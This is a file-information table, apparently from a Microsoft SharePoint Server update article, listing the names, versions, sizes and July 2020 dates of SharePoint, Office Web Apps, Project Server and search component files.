microsoft.office.policy.pages.dll| 16.0.10363.12107| 540040| 7-Jul-20| 01:30 \nauditcustquery.ascx| auditcustomquery.ascx| | 11154| 7-Jul-20| 01:30 \nauditsettings.ascx| auditsettings.ascx| | 3594| 7-Jul-20| 01:30 \nbarcodesettings.ascx| barcodesettings.ascx| | 1399| 7-Jul-20| 01:30 \ndiscoveryglobalcontrol.ascx| discoveryglobalcontrol.ascx| | 5175| 7-Jul-20| 01:30 \ndiscoveryproperties.ascx| discoveryproperties.ascx| | 7132| 7-Jul-20| 01:30 \ndiscoveryquerystatistics.ascx| discoveryquerystatistics.ascx| | 3788| 7-Jul-20| 01:30 \ndlptemplatepicker.ascx| dlptemplatepicker.ascx| | 3594| 7-Jul-20| 01:30 \nlabelsettings.ascx| labelsettings.ascx| | 9510| 7-Jul-20| 01:30 \nretentionsettings.ascx| retentionsettings.ascx| | 11060| 7-Jul-20| 01:30 \ndw20.exe_0001| dw20.exe| 16.0.10363.12107| 2129328| 7-Jul-20| 11:22 \ndwtrig20.exe| dwtrig20.exe| 16.0.10363.12107| 318944| 7-Jul-20| 11:22 \nconversion.office.gfxserver.dll| gfxserver.dll| 16.0.10363.12107| 5274528| 7-Jul-20| 11:22 \nppt.conversion.gfxserver.dll| gfxserver.dll| 16.0.10363.12107| 5274528| | \nppt.edit.gfxserver.dll| gfxserver.dll| 16.0.10363.12107| 5274528| | \nwac.office.gfxserver.dll| gfxserver.dll| 16.0.10363.12107| 5274528| | \nconversion.igxserver.dll| igxserver.dll| 16.0.10363.12107| 12129168| 7-Jul-20| 11:25 \nppt.conversion.igxserver.dll| igxserver.dll| 16.0.10363.12107| 12129168| | \nppt.edit.igxserver.dll| igxserver.dll| 16.0.10363.12107| 12129168| | \nwac.office.igxserver.dll| igxserver.dll| 16.0.10363.12107| 12129168| | \nsltemp.asc| sldlibtemplates.ascx| | 12554| 5-Jul-20| 09:49 \nsldlib.js| sldlib.js| | 29295| 5-Jul-20| 09:37 \neditdlg.htm_slfeat| editdlg.htm| | 4796| 5-Jul-20| 09:31 \nfiledlg.htm_slfeat| filedlg.htm| | 3344| 5-Jul-20| 09:31 \nclientx.dll| microsoft.office.sharepoint.clientextensions.dll| 16.0.10363.12107| 381904| 7-Jul-20| 11:25 \nclientxr.dll.x64| microsoft.office.sharepoint.clientextensions.dll| 16.0.10363.12107| 381904| 7-Jul-20| 11:25 \nmicrosoft.office.server.chart.dll| microsoft.office.server.chart.dll| 16.0.10363.12107| 603064| 7-Jul-20| 11:30 \nmicrosoft.office.server.chart_gac.dll| microsoft.office.server.chart.dll| 16.0.10363.12107| 603064| 7-Jul-20| 11:30 \nas_adal_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| adal.dll| | 1456656| 5-Jul-20| 09:50 \nas_adal_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| adal.dll| | 1784544| 5-Jul-20| 09:52 \nas_azureclient_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| microsoft.analysisservices.azureclient.dll| | 316496| 5-Jul-20| 09:52 \nas_azureclient_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| microsoft.analysisservices.azureclient.dll| | 316496| 5-Jul-20| 09:50 \nas_client_db2v0801_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| db2v0801.xsl| | 30717| 5-Jul-20| 09:50 \nas_client_db2v0801_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| db2v0801.xsl| | 30717| 5-Jul-20| 09:50 \nas_client_hive_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| hive.xsl| | 81782| 5-Jul-20| 09:51 \nas_client_hive_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| hive.xsl| | 81782| 5-Jul-20| 09:51 \nas_client_msql_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msql.xsl| | 128792| 5-Jul-20| 09:50 \nas_client_msql_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msql.xsl| | 128792| 5-Jul-20| 09:50 \nas_client_orcl7_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| orcl7.xsl| | 95739| 5-Jul-20| 09:50 \nas_client_orcl7_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| orcl7.xsl| | 95739| 5-Jul-20| 09:50 \nas_client_sqlpdw_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqlpdw.xsl| | 105635| 5-Jul-20| 09:51 \nas_client_sqlpdw_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqlpdw.xsl| | 105635| 5-Jul-20| 09:51 \nas_client_trdtv2r41_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| trdtv2r41.xsl| | 105800| 5-Jul-20| 09:50 \nas_client_trdtv2r41_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| trdtv2r41.xsl| | 105800| 5-Jul-20| 09:50 \nas_client_xmsrv_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmsrv.dll| | 35081808| 5-Jul-20| 09:50 \nas_client_xmsrv_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmsrv.dll| | 25498704| 5-Jul-20| 09:52 \nas_clientas80_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as80.xsl| | 17484| 5-Jul-20| 09:50 \nas_clientas80_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as80.xsl| | 17484| 5-Jul-20| 09:50 \nas_clientas90_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as90.xsl| | 20021| 5-Jul-20| 09:50 \nas_clientas90_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as90.xsl| | 20021| 5-Jul-20| 09:50 \nas_clientinformix_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| informix.xsl| | 32145| 5-Jul-20| 09:51 \nas_clientinformix_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| informix.xsl| | 32145| 5-Jul-20| 09:51 \nas_clientmsjet_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msjet.xsl| | 30427| 5-Jul-20| 09:51 \nas_clientmsjet_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msjet.xsl| | 30427| 5-Jul-20| 09:51 \nas_clientmsmgdsrv_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmgdsrv.dll| | 7638824| 5-Jul-20| 09:50 \nas_clientmsmgdsrv_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmgdsrv.dll| | 9328720| 5-Jul-20| 09:52 \nas_clientsql120_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql120.xsl| | 135247| 5-Jul-20| 09:50 \nas_clientsql120_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql120.xsl| | 135247| 5-Jul-20| 09:50 \nas_clientsql2000_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql2000.xsl| | 35014| 5-Jul-20| 09:50 \nas_clientsql2000_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql2000.xsl| | 35014| 5-Jul-20| 09:50 \nas_clientsql70_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql70.xsl| | 33181| 5-Jul-20| 09:50 \nas_clientsql70_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql70.xsl| | 33181| 5-Jul-20| 09:50 \nas_clientsql90_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql90.xsl| | 136426| 5-Jul-20| 09:50 \nas_clientsql90_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql90.xsl| | 136426| 5-Jul-20| 09:50 \nas_clientsybase_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sybase.xsl| | 30964| 5-Jul-20| 09:51 \nas_clientsybase_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sybase.xsl| | 30964| 5-Jul-20| 09:51 \nas_msmdlocal_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmdlocal.dll| | 45813840| 5-Jul-20| 09:50 \nas_msmdlocal_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmdlocal.dll| | 63495968| 5-Jul-20| 09:51 \nas_msolap_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolap.dll| | 7999272| 5-Jul-20| 09:52 \nas_msolap_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolap.dll| | 10331936| 5-Jul-20| 09:51 \nas_msolui_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolui.dll| | 292128| 5-Jul-20| 09:51 \nas_msolui_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolui.dll| | 312616| 5-Jul-20| 09:50 \nas_sqldumper_exe_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqldumper.exe| | 147560| 5-Jul-20| 09:52 \nas_sqldumper_exe_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqldumper.exe| | 172368| 5-Jul-20| 09:51 \nas_xmlrw_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrw.dll| | 289376| 5-Jul-20| 09:52 \nas_xmlrw_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrw.dll| | 333928| 5-Jul-20| 09:50 \nas_xmlrwbin_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrwbin.dll| | 194152| 5-Jul-20| 09:50 \nas_xmlrwbin_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrwbin.dll| | 224864| 5-Jul-20| 09:51 \nconversion.office.mso99lres.dll| mso99lres.dll| 16.0.10363.12107| 14548904| 7-Jul-20| 11:30 \nppt.conversion.mso99lres.dll| mso99lres.dll| 16.0.10363.12107| 14548904| | \nppt.edit.mso99lres.dll| mso99lres.dll| 16.0.10363.12107| 14548904| | \nwac.office.mso99lres.dll| mso99lres.dll| 16.0.10363.12107| 14548904| | \nconversion.office.mso20win32server.dll| mso20win32server.dll| 16.0.10363.12107| 4394912| 7-Jul-20| 11:30 \nmso.mso20win32server.dll| mso20win32server.dll| 16.0.10363.12107| 4394912| | \nppt.conversion.mso20win32server.dll| mso20win32server.dll| 16.0.10363.12107| 4394912| | \nppt.edit.mso20win32server.dll| mso20win32server.dll| 16.0.10363.12107| 4394912| | \nwac.office.mso20win32server.dll| mso20win32server.dll| 16.0.10363.12107| 4394912| | \nconversion.office.mso30win32server.dll| mso30win32server.dll| 16.0.10363.12107| 5585304| 7-Jul-20| 11:30 \nmso.mso30win32server.dll| mso30win32server.dll| 16.0.10363.12107| 5585304| | \nppt.conversion.mso30win32server.dll| mso30win32server.dll| 16.0.10363.12107| 5585304| | \nppt.edit.mso30win32server.dll| mso30win32server.dll| 16.0.10363.12107| 5585304| | \nwac.office.mso30win32server.dll| mso30win32server.dll| 16.0.10363.12107| 5585304| | \nconversion.office.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10363.12107| 12483488| 7-Jul-20| 11:30 \nppt.conversion.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10363.12107| 12483488| | \nppt.edit.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10363.12107| 12483488| | \nwac.office.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10363.12107| 12483488| | \nconversion.office.mso98win32server.dll| mso98win32server.dll| 16.0.10363.12107| 3950488| 7-Jul-20| 11:25 \nppt.conversion.mso98win32server.dll| mso98win32server.dll| 16.0.10363.12107| 3950488| | \nppt.edit.mso98win32server.dll| mso98win32server.dll| 16.0.10363.12107| 3950488| | \nwac.office.mso98win32server.dll| mso98win32server.dll| 16.0.10363.12107| 3950488| | \nconversion.office.msoserver.dll| msoserver.dll| 16.0.10363.12107| 14474648| 7-Jul-20| 11:25 \nppt.conversion.msoserver.dll| msoserver.dll| 16.0.10363.12107| 14474648| | \nppt.edit.msoserver.dll| msoserver.dll| 16.0.10363.12107| 14474648| | \nwac.office.msoserver.dll| msoserver.dll| 16.0.10363.12107| 14474648| | \nmicrosoft.office.web.common.dll| microsoft.office.web.common.dll| 16.0.10363.12107| 1973168| 7-Jul-20| 11:30 \nnl7data0011.dll_osssearch| nl7data0011.dll| 16.0.10363.12107| 7782880| 7-Jul-20| 11:30 \nnl7data0404.dll_osssearch| nl7data0404.dll| 16.0.10363.12107| 2708472| 7-Jul-20| 11:30 \nnl7data0804.dll_osssearch| nl7data0804.dll| 16.0.10363.12107| 3588096| 7-Jul-20| 11:30 \nconversion.oartodfserver.dll| oartodfserver.dll| 16.0.10363.12107| 3555736| 7-Jul-20| 11:30 \nppt.conversion.oartodfserver.dll| oartodfserver.dll| 16.0.10363.12107| 3555736| | \nppt.edit.oartodfserver.dll| oartodfserver.dll| 16.0.10363.12107| 3555736| | \nwac.office.oartodfserver.dll| oartodfserver.dll| 16.0.10363.12107| 3555736| | \nconversion.office.oartserver.dll| oartserver.dll| 16.0.10363.12107| 18202016| 7-Jul-20| 11:30 \nppt.conversion.oartserver.dll| oartserver.dll| 16.0.10363.12107| 18202016| | \nppt.edit.oartserver.dll| oartserver.dll| 16.0.10363.12107| 18202016| | \nwac.office.oartserver.dll| oartserver.dll| 16.0.10363.12107| 18202016| | \nmicrosoft.office.connectedservices.identity.dll| microsoft.office.connectedservices.identity.dll| 16.0.10363.12107| 62872| 7-Jul-20| 11:29 \nconversion.cultures.office.odf| office.odf| | 2224560| 7-Jul-20| 11:29 \noffice.odf| office.odf| | 2224560| 7-Jul-20| 11:29 \nppt.conversion.cultures.office.odf| office.odf| | 2224560| | \nvisioserver.cultures.office.odf| office.odf| | 2224560| 7-Jul-20| 11:29 \nwac.conversion.cultures.office.odf| office.odf| | 2224560| | \nwac.powerpoint.edit.bin.cultures.office.odf| office.odf| | 2224560| | \nxlsrv.ecs.culture.office.odf| office.odf| | 2224560| | \nxlsrv.ecs.office.odf| office.odf| | 2224560| | \nconversionhtmlutil.dll| htmlutil.dll| 16.0.10363.12107| 2854816| 7-Jul-20| 11:29 \nonetnative.dll| onetnative.dll| 16.0.10363.12107| 811960| 7-Jul-20| 11:29 \nonetnative_1.dll| onetnative.dll| 16.0.10363.12107| 811960| 7-Jul-20| 11:29 \nonetutil.dll| onetutil.dll| 16.0.10363.12107| 2866080| 7-Jul-20| 11:29 \nconversion.office.osfserver.dll| osfserver.dll| 16.0.10363.12107| 164264| 7-Jul-20| 11:25 \nwac.office.osfserver.dll| osfserver.dll| 16.0.10363.12107| 164264| | \nconversion.office.osfsharedserver.dll| osfsharedserver.dll| 16.0.10363.12107| 734112| 7-Jul-20| 11:25 \nwac.office.osfsharedserver.dll| osfsharedserver.dll| 16.0.10363.12107| 734112| | \nconversion.office.osfuiserver.dll| osfuiserver.dll| 16.0.10363.12107| 488360| 7-Jul-20| 11:25 \nwac.office.osfuiserver.dll| osfuiserver.dll| 16.0.10363.12107| 488360| | \nosfserver_activities_dll.x64| microsoft.sharepoint.workflowservices.activities.dll| 16.0.10363.12107| 286136| 7-Jul-20| 11:24 \nosfserver_workflow_dll| microsoft.sharepoint.workflowservices.dll| 16.0.10363.12107| 487880| 7-Jul-20| 11:24 \nosfextap.dll| microsoft.sharepoint.officeextension.applicationpages.dll| 16.0.10363.12107| 16320| 7-Jul-20| 11:24 \noffice_extension_manager_js| sp.officeextensionmanager.js| | 50999| 7-Jul-20| 11:25 \nmicrosoft.office.serviceinfrastructure.runtime.dll| microsoft.office.serviceinfrastructure.runtime.dll| 16.0.10363.12107| 1053136| 7-Jul-20| 11:30 \nosrvadml.xml| officeserveradminlinks.xml| | 3483| 5-Jul-20| 09:48 \nugcdot.xml| feature.xml| | 629| 5-Jul-20| 09:49 \nmicrosoft.office.server.directory.sharepoint| microsoft.office.server.directory.sharepoint.dll| 16.0.10363.12107| 747472| 7-Jul-20| 11:25 \nmicrosoft.office.server.dll| microsoft.office.server.dll| 16.0.10363.12107| 3042200| 7-Jul-20| 11:25 \nmicrosoft.office.server.dll_isapi| microsoft.office.server.dll| 16.0.10363.12107| 3042200| 7-Jul-20| 11:25 \nmicrosoft.office.server.openxml.dll| microsoft.office.server.openxml.dll| 16.0.10363.12107| 1658296| 7-Jul-20| 11:25 \nmicrosoft.office.server.userprofiles.dll| microsoft.office.server.userprofiles.dll| 16.0.10363.12107| 5326784| 7-Jul-20| 11:25 \nmicrosoft.office.server.userprofiles.dll_isapi| microsoft.office.server.userprofiles.dll| 16.0.10363.12107| 5326784| 7-Jul-20| 11:25 \nmicrosoft.sharepoint.taxonomy.dll| microsoft.sharepoint.taxonomy.dll| 16.0.10363.12107| 1744288| 7-Jul-20| 11:25 \nmicrosoft.sharepoint.taxonomy.dll_gac| microsoft.sharepoint.taxonomy.dll| 16.0.10363.12107| 1744288| 7-Jul-20| 11:25 \nmicrosoft.sharepoint.taxonomy.dll_gac1| microsoft.sharepoint.taxonomy.dll| 16.0.10363.12107| 1744288| 7-Jul-20| 11:25 \nmicrosoft.office.server.userprofiles.proxy.dll| microsoft.office.server.userprofiles.dll| 16.0.10363.12107| 1465800| 7-Jul-20| 11:25 \nscriptresources.rsx| scriptresources.resx| | 18203| 7-Jul-20| 11:25 \nscriptforwebtaggingui.js| scriptforwebtaggingui.js| | 132713| 5-Jul-20| 09:34 \nsp.ui.taxonomy.js| sp.ui.taxonomy.js| | 46397| 5-Jul-20| 09:35 \nmediaplayer.xap| mediaplayer.xap| | 38368| 7-Jul-20| 01:54 \ndecompositiontree.xap| decompositiontree.xap| | 108267| 7-Jul-20| 01:54 \naddgal.xap| addgallery.xap| | 407676| 7-Jul-20| 01:54 \nwpgalim.xap| webpartgalleryimages.xap| | 100639| 7-Jul-20| 01:54 \naddgallery.xap_silverlight| addgallery.xap| | 373928| 7-Jul-20| 01:54 \nmicrosoft.sharepoint.client.xap| microsoft.sharepoint.client.xap| | 312914| 7-Jul-20| 01:54 \ndsigres.cab.x64| dsigres.cab| | 229711| 7-Jul-20| 01:54 \ndsigres.cab.x64_10266| dsigres.cab| | 229711| 7-Jul-20| 01:54 \ndsigres.cab.x64_1033| dsigres.cab| | 229711| 7-Jul-20| 01:54 \ndsigres.cab.x64_1087| dsigres.cab| | 229711| 7-Jul-20| 01:54 \ndsigctrl.cab.x64| dsigctrl.cab| | 479611| 7-Jul-20| 01:54 \ndsigres.cab.x86| dsigres.cab| | 191355| 7-Jul-20| 01:55 \ndsigres.cab.x86_10266| dsigres.cab| | 191355| 7-Jul-20| 01:55 \ndsigres.cab.x86_1033| dsigres.cab| | 191355| 7-Jul-20| 01:55 \ndsigres.cab.x86_1087| dsigres.cab| | 191355| 7-Jul-20| 01:55 \ndsigctrl.cab.x86| dsigctrl.cab| | 526579| 7-Jul-20| 01:55 \nmossbi.wfe.gac.scorecards.client.dll| microsoft.performancepoint.scorecards.client.dll| 16.0.10363.12107| 2227168| 7-Jul-20| 11:25 \nmossbi.wfe.gac.scorecards.servercommon.dll| microsoft.performancepoint.scorecards.servercommon.dll| 16.0.10363.12107| 333824| 7-Jul-20| 11:25 \nppt.conversion.ppserver.dll| ppserver.dll| 16.0.10363.12107| 12353456| 7-Jul-20| 11:25 \nppt.edit.ppserver.dll| ppserver.dll| 16.0.10363.12107| 12353456| | \nmicrosoft.office.server.powerpoint.dll| microsoft.office.server.powerpoint.dll| 16.0.10363.12107| 108976| 7-Jul-20| 11:30 \npowerpointpowershell.format.ps1xml| powerpointpowershell.format.ps1xml| | 14378| 5-Jul-20| 09:50 \npjintl_1_new.dll| pjintl.dll| 16.0.10363.12107| 4898224| 7-Jul-20| 11:27 \nschedengine_new.exe| schedengine.exe| 16.0.10363.12107| 16456656| 7-Jul-20| 11:30 \nmicrosoft.projectserver.client.silverlight.dll| microsoft.projectserver.client.silverlight.dll| 16.0.10363.12107| 396184| 7-Jul-20| 11:29 \nmicrosoft.projectserver.client.phone.dll| microsoft.projectserver.client.phone.dll| 16.0.10363.12107| 396192| 7-Jul-20| 11:25 \ncontentdatabasecreate.sql| contentdatabasecreate.sql| | 8485872| 7-Jul-20| 11:26 \nmicrosoft.office.project.schema.dll| microsoft.office.project.schema.dll| 16.0.10363.12107| 6844312| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.communications.dll| microsoft.office.project.server.communications.dll| 16.0.10363.12107| 371608| 7-Jul-20| 11:29 \nmicrosoft.office.project.server.communications.internal.dll| microsoft.office.project.server.communications.internal.dll| 16.0.10363.12107| 761248| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.database.dll| microsoft.office.project.server.database.dll| 16.0.10363.12107| 10454936| 7-Jul-20| 11:29 \nmicrosoft.office.project.server.database.extension.dll| microsoft.office.project.server.database.extension.dll| 16.0.10363.12107| 4377512| 7-Jul-20| 11:29 \nmicrosoft.office.project.server.dll| microsoft.office.project.server.dll| 16.0.10363.12107| 9607064| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.events.remote.dll| microsoft.office.project.server.events.remote.dll| 16.0.10363.12107| 59304| 7-Jul-20| 11:29 \nmicrosoft.office.project.server.inproc.dll| microsoft.office.project.server.inproc.dll| 16.0.10363.12107| 802216| 7-Jul-20| 11:29 \nmicrosoft.office.project.server.library.dll| microsoft.office.project.server.library.dll| 16.0.10363.12107| 1971624| 7-Jul-20| 11:30 \nsdk.microsoft.office.project.server.library.dll| microsoft.office.project.server.library.dll| 16.0.10363.12107| 1971624| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.workflow.dll| microsoft.office.project.server.workflow.dll| 16.0.10363.12107| 196512| 7-Jul-20| 11:29 \nsdk.microsoft.office.project.server.workflow.dll| microsoft.office.project.server.workflow.dll| 16.0.10363.12107| 196512| 7-Jul-20| 11:29 \nmicrosoft.office.project.shared.dll| microsoft.office.project.shared.dll| 16.0.10363.12107| 1897384| 7-Jul-20| 11:30 \nsdk.microsoft.office.project.shared.dll| microsoft.office.project.shared.dll| 16.0.10363.12107| 1897384| 7-Jul-20| 11:30 \nmicrosoft.projectserver.client.dll| microsoft.projectserver.client.dll| 16.0.10363.12107| 396248| 7-Jul-20| 11:30 \nmicrosoft.projectserver.client.dll_001| microsoft.projectserver.client.dll| 16.0.10363.12107| 396248| 7-Jul-20| 11:30 \nmicrosoft.projectserver.dll| microsoft.projectserver.dll| 16.0.10363.12107| 888792| 7-Jul-20| 11:29 \nmicrosoft.projectserver.dll_001| microsoft.projectserver.dll| 16.0.10363.12107| 888792| 7-Jul-20| 11:29 \nmicrosoft.projectserver.serverproxy.dll| microsoft.projectserver.serverproxy.dll| 16.0.10363.12107| 1305056| 7-Jul-20| 11:29 \nps.csom.scriptclient.debug.js| ps.debug.js| | 1030292| 5-Jul-20| 09:35 \nps.csom.scriptclient.js| ps.js| | 623325| 5-Jul-20| 09:36 \nmicrosoft.office.project.server.pwa.applicationpages.dll| microsoft.office.project.server.pwa.applicationpages.dll| 16.0.10363.12107| 1051104| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.pwa.dll| microsoft.office.project.server.pwa.dll| 16.0.10363.12107| 2758624| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.administration.dll| microsoft.office.project.server.administration.dll| 16.0.10363.12107| 1002920| 7-Jul-20| 11:30 \npwa.admin.addmodifyuser.aspx| addmodifyuser.aspx| | 143704| 5-Jul-20| 09:48 \npwa.admin.editcustomfield.aspx| editcustomfield.aspx| | 153222| 5-Jul-20| 09:48 \npwa.admin.editlookuptable.aspx| editlookuptable.aspx| | 71493| 5-Jul-20| 09:48 \npwa.library.projectdrilldownsatellite.debug.js| projectdrilldownsatellite.debug.js| | 152603| 5-Jul-20| 09:48 \npwa.library.projectdrilldownsatellite.js| projectdrilldownsatellite.js| | 83340| 5-Jul-20| 09:48 \npwa.library.projectservertreepicker.debug.js| projectservertreepicker.debug.js| | 81985| 5-Jul-20| 09:35 \npwa.library.projectservertreepicker.js| projectservertreepicker.js| | 42509| 5-Jul-20| 09:34 \npwa.library.projectserverscripts.core.debug.js| ps.core.debug.js| | 373260| 5-Jul-20| 09:35 \npwa.library.projectserverscripts.core.js| ps.core.js| | 228332| 5-Jul-20| 09:35 \npwa.library.projectserverscripts.rm.debug.js| ps.resourcemanagers.debug.js| | 255143| 5-Jul-20| 09:35 \npwa.library.projectserverscripts.rm.js| ps.resourcemanagers.js| | 155142| 5-Jul-20| 09:35 \npwa.library.shell.debug.js| shell.debug.js| | 92012| 5-Jul-20| 09:35 \npwa.library.shell.js| shell.js| | 45380| 5-Jul-20| 09:35 \npwa.resx| pwa.resx| | 824177| 7-Jul-20| 11:26 \npwa.timesheet.timesheethistory.aspx| timesheethistory.aspx| | 4300| 5-Jul-20| 09:49 \nworkflowactivitiesdll| microsoft.office.project.server.workflowactivities.dll| 16.0.10363.12107| 55192| 7-Jul-20| 11:30 \nconversion.office.riched20.dll| riched20.dll| 16.0.10363.12107| 3242896| 7-Jul-20| 11:27 \nppt.conversion.riched20.dll| riched20.dll| 16.0.10363.12107| 3242896| | \nppt.edit.riched20.dll| riched20.dll| 16.0.10363.12107| 3242896| | \nwac.office.riched20.dll| riched20.dll| 16.0.10363.12107| 3242896| | \nxlsrv.ecs.riched20.dll| riched20.dll| 16.0.10363.12107| 3242896| | \nmicrosoft.eedict_companies.de.dll| microsoft.eedict_companies.de| 16.0.10363.12107| 18848| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.dll| microsoft.eedict_companies| 16.0.10363.12107| 109863848| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.en.dll| microsoft.eedict_companies.en| 16.0.10363.12107| 16816| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.es.dll| microsoft.eedict_companies.es| 16.0.10363.12107| 16808| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.fr.dll| microsoft.eedict_companies.fr| 16.0.10363.12107| 24992| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.it.dll| microsoft.eedict_companies.it| 16.0.10363.12107| 46504| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.ja.dll| microsoft.eedict_companies.ja| 16.0.10363.12107| 1533872| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.nl.dll| microsoft.eedict_companies.nl| 16.0.10363.12107| 18344| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.no.dll| microsoft.eedict_companies.no| 16.0.10363.12107| 2098096| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.pt.dll| microsoft.eedict_companies.pt| 16.0.10363.12107| 17840| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.ru.dll| microsoft.eedict_companies.ru| 16.0.10363.12107| 33214896| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies_acceptor.ar.dll| microsoft.eedict_companies_acceptor.ar| 16.0.10363.12107| 9888160| 7-Jul-20| 11:25 \nmicrosoft.stopworddictionary.dll| microsoft.stopworddictionary.dll| 16.0.10363.12107| 32680| 7-Jul-20| 11:25 \nmicrosoft.system_dictionaries_spellcheck.dll| microsoft.system_dictionaries_spellcheck.dll| 16.0.10363.12107| 24632744| 7-Jul-20| 11:25 \nodffilt.dll.x64| odffilt.dll| 16.0.10363.12107| 1840064| 7-Jul-20| 11:30 \nofffiltx.dll.x64| offfiltx.dll| 16.0.10363.12107| 2115016| 7-Jul-20| 11:30 \nmicrosoft.ceres.common.utils.dllmsil| microsoft.ceres.common.utils.dll| 16.0.10363.12107| 322472| 7-Jul-20| 11:25 \nmicrosoft.ceres.contentengine.contentpush.dll| microsoft.ceres.contentengine.contentpush.dll| 16.0.10363.12107| 160160| 7-Jul-20| 11:25 \nmicrosoft.ceres.contentengine.nlpevaluators.dll| microsoft.ceres.contentengine.nlpevaluators.dll| 16.0.10363.12107| 251808| 7-Jul-20| 11:25 \nmicrosoft.ceres.contentengine.operators.mars.dll| microsoft.ceres.contentengine.operators.mars.dll| 16.0.10363.12107| 37280| 7-Jul-20| 11:30 \ndocumentformat.openxml.dllmsil2| documentformat.openxml.dll| 2.6.0.4| 5305360| | \nupdate_documentformat.openxml.dllmsil2| documentformat.openxml.dll| 2.6.0.4| 5305360| 5-Jul-20| 09:23 \nsystem.io.packaging.dllmsil| system.io.packaging.dll| 1.0.0.4| 121872| | \nupdate_system.io.packaging.dllmsil| system.io.packaging.dll| 1.0.0.4| 121872| 5-Jul-20| 09:23 \nmicrosoft.ceres.docparsing.formathandlers.pdf.dllmsil| microsoft.ceres.docparsing.formathandlers.pdf.dll| 16.0.10363.12107| 4217248| 7-Jul-20| 11:25 \nmicrosoft.ceres.interactionengine.processing.builtin.dll| microsoft.ceres.interactionengine.processing.builtin.dll| 16.0.10363.12107| 402856| 7-Jul-20| 11:25 \nmicrosoft.ceres.nlpbase.dictionaries.dll| microsoft.ceres.nlpbase.dictionaries.dll| 16.0.10363.12107| 138656| 7-Jul-20| 11:25 \nmanagedblingsigned.dll| managedblingsigned.dll| | 1862344| | \nupdate_managedblingsigned.dll| managedblingsigned.dll| | 1862344| 5-Jul-20| 09:42 \nmicrosoft.ceres.nlpbase.richfields.dll| microsoft.ceres.nlpbase.richfields.dll| 16.0.10363.12107| 97696| 7-Jul-20| 11:25 \nmicrosoft.sharepointsearchproviderflow.dll| microsoft.sharepointsearchproviderflow.dll| 16.0.10363.3000| 27064| 7-Jul-20| 11:26 \nsearchcore.clustering.indexclusteringmember.dll| microsoft.ceres.searchcore.clustering.indexclusteringmember.dll| 16.0.10363.12107| 62368| 7-Jul-20| 11:27 